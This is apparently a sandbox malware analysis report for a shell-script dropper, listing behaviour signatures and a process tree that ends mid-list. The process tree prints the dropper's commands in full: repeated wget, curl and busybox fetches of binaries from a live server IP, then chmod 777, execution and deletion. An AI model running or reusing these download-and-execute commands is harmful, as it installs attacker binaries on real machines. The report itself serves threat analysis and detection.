Malware Analysis Report

2025-04-03 19:11

Sample ID 241121-ja8bratrer
Target a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
SHA256 a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f
Tags
antivm defense_evasion discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f

Threat Level: Shows suspicious behavior

The file a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 07:29

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 07:29

Reported

2024-11-21 07:31

Platform

debian9-armhf-20240611-en

Max time kernel

51s

Max time network

54s

Command Line

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb N/A
N/A /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm N/A
N/A /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 N/A
N/A /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn N/A
N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z N/A
N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc N/A
N/A /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD N/A
N/A /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs N/A
N/A /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs N/A
N/A /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G N/A
N/A /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A
File opened for modification /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ /usr/bin/curl N/A
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A
File opened for modification /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc /usr/bin/curl N/A
File opened for modification /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD /usr/bin/curl N/A
File opened for modification /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G /usr/bin/curl N/A
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A
File opened for modification /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs /usr/bin/curl N/A
File opened for modification /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM /usr/bin/curl N/A
File opened for modification /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe /usr/bin/curl N/A
File opened for modification /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm /usr/bin/curl N/A
File opened for modification /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn /usr/bin/curl N/A
File opened for modification /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z /usr/bin/curl N/A
File opened for modification /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 /usr/bin/curl N/A

Processes

/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh

[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/chmod

[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/bin/rm

[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]

/usr/bin/wget

[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/chmod

[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs

[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/bin/rm

[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]

/usr/bin/wget

[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/chmod

[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs

[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/bin/rm

[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]

/usr/bin/wget

[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/chmod

[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G

[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/bin/rm

[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]

/usr/bin/wget

[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/chmod

[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb

[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/bin/rm

[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]

/usr/bin/wget

[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/chmod

[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe

[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/bin/rm

[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/chmod

[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc

[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/bin/rm

[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]

/usr/bin/wget

[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/chmod

[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD

[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/bin/rm

[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/chmod

[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ

[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/rm

[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/chmod

[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm

[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/bin/rm

[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]

/usr/bin/wget

[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/chmod

[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6

[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/bin/rm

[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]

/usr/bin/wget

[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/chmod

[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn

[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/bin/rm

[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]

/usr/bin/wget

[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/chmod

[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM

[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/bin/rm

[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]

/usr/bin/wget

[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/chmod

[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z

[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/bin/rm

[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]

/usr/bin/wget

[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]

/bin/busybox

